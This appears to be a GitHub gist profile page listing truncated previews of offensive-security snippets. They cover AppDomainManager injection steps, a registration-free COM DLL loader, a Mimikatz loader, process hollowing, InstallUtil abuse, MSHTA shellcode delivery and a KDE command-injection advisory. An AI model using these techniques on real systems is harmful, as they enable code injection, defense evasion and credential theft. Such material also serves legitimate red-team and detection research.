Skip to content

Instantly share code, notes, and snippets.

View xenoscr's full-sized avatar
💭
Human Popsicle

Conor Richard xenoscr

💭
Human Popsicle
103 followers · 5 following
View GitHub Profile
@xenoscr
xenoscr / _Instructions_Reproduce.md
Created April 29, 2020 08:07
GhostLoader - AppDomainManager - Injection - 攻壳机动队

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
@xenoscr
xenoscr / boom.html
Created April 11, 2020 10:57
FailFast Exception Generator - Fault Tracing Practice
<!-- saved from url=(0014)about:internet -->
<html>
<head>
<style>
body::first-letter {
background: url(data:image/gif;base64,R0lGODlhEAAQAMQAAORHHOVSKudfOulrSOp3WOyDZu6QdvCchPGolfO0o/XBs/fNwfjZ0frl3/zy7////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAkAABAALAAAAAAQABAAAAVVICSOZGlCQAosJ6mu7fiyZeKqNKToQGDsM8hBADgUXoGAiqhSvp5QAnQKGIgUhwFUYLCVDFCrKUE1lBavAViFIDlTImbKC5Gm2hB0SlBCBMQiB0UjIQA7) repeat-x scroll top left;
}
@xenoscr
xenoscr / basic.js
Created March 31, 2020 02:03
Basic / MyDLL
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Windows\\System32\\Tasks';
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_ASM') = "mydll, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null"
//new ActiveXObject('WScript.Shell').Environment('Process')('APPDOMAIN_MANAGER_TYPE') = "MyAppDomainManager";
new ActiveXObject('WScript.Shell').Environment('Process')('COMPLUS_Version') = 'v4.0.30319';
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?><assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <dependency><dependentAssembly> <assemblyIdentity name="tasks" version="0.0.0.0"/> </dependentAssembly> </dependency> <assemblyIdentity name="tasks" type="win32" version="0.0.0.0" /><description>Built with love by Casey Smith @subTee </description><clrClass name="MyDLL.Operations" clsid="{31D2B969-7608-426E-9D8E-A09FC9A5ACDC}" progid="MyDLL.Operations" ru
@xenoscr
xenoscr / DllLoadAnythingViaScript
Created February 11, 2020 13:46 — forked from analyticsearch/DllLoadAnythingViaScript
DynamicWrapperX - Dropper , Registration-Free Execution
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load.
# Sample DLL To inject here
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179
$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>';
$ax = new-object -Com "Microsoft.Windows.ActCtx"
$ax.ManifestText = $manifest;
$DWX = $ax.CreateObject("JustMakeSomethingUp");
@xenoscr
xenoscr / NtQuerySystemInformation.h
Created January 29, 2020 02:52 — forked from jNizM/NtQuerySystemInformation.h
Undocumented NtQuerySystemInformation Structures
// http://www.exploit-monday.com/2013/06/undocumented-ntquerysysteminformation.html
// //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
enum _SYSTEM_INFORMATION_CLASS
{
SystemBasicInformation = 0x0000,
SystemProcessorInformation = 0x0001,
SystemPerformanceInformation = 0x0002,
SystemTimeOfDayInformation = 0x0003,
@xenoscr
xenoscr / kde-kdesktopfile-command-injection.txt
Created August 5, 2019 02:00 — forked from zeropwn/kde-kdesktopfile-command-injection.txt
KDE 4/5 is vulnerable to a command injection vulnerability in the KDesktopFile class.
_ _
_______ _ __ ___ | | ___ | |
|_ / _ \ '__/ _ \ | |/ _ \| |
/ / __/ | | (_) || | (_) | |
/___\___|_| \___(_)_|\___/|_|
https://zero.lol
zero days 4 days
Title: KDE 4/5 KDesktopFile Command Injection
Date: July 28th 2019
@xenoscr
xenoscr / Tasks.cs
Created August 3, 2019 14:03
Almost :) - BulletProof Mimikatz - Load and execute Mimikatz in stordiag.exe.
using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
/*
@xenoscr
xenoscr / gethelp.cs
Created May 14, 2019 09:41
Help Me! MSDN InstallUtil - https://docs.microsoft.com/en-us/dotnet/api/system.configuration.install.installer.helptext?view=netframework-4.8
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
@xenoscr
xenoscr / Hollowing.cs
Created April 18, 2019 19:23 — forked from smgorelik/Hollowing.cs
Simple Process Hollowing C#
/***************
* Simple Process Hollowing in C#
*
* #Build Your Binaries
* c:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe Hollowing.cs /unsafe
*
* @author: Michael Gorelik <smgorelik@gmail.com>
* gist.github.com/smgorelik/9a80565d44178771abf1e4da4e2a0e75
* #Most of the code taken from here: @github: github.com/ambray
@xenoscr
xenoscr / TestMSHTAShellcodeDelivery.ps1
Created April 11, 2019 12:50
MSHTA Test For Defenders - hosts hta in PowerShell, connected remotely and execute.
<#
Simply Invoke the Script and send the target a link to http://192.168.1.1/app.hta
To change your server, simply find and replace 192.168.1.1 with your server in the code.
#>
<#
Moving Credtis for CACTUSTORCH HERE
I was in escape sequcence hell ;-)
' ( ) ( )